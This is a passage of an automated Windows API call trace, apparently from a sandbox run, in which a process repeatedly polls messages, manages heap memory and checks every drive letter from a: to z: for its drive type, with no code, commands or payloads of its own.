returned 0x14bd208 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.694] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0215.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0215.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0215.694] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0215.694] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.695] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.695] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.695] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.696] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.696] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0215.696] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.696] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.696] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.697] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.697] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.697] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.697] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.697] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.697] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.698] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.698] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.698] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.698] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.698] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.698] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.698] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.699] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.699] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.699] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.699] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.699] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.699] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.699] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.700] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.700] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.700] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.700] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0215.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0215.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0215.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0215.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0215.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0215.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.702] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.702] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.702] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.702] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.703] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.703] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.703] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.703] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.703] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.703] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.703] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.704] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.704] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.704] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.704] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.709] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.709] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.710] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.710] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.710] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.710] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.710] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.710] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.710] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.711] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.711] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.711] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.711] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.711] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.711] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.711] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.712] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.712] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.712] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.712] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0215.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0215.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0215.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.713] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.713] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.713] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.714] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.714] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.714] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.714] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.714] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.715] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.715] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.715] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.715] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.715] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.716] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.716] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.716] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.716] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.716] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.716] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.717] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.717] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.717] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.717] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.717] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.717] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.718] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.718] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.718] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.718] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.718] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: 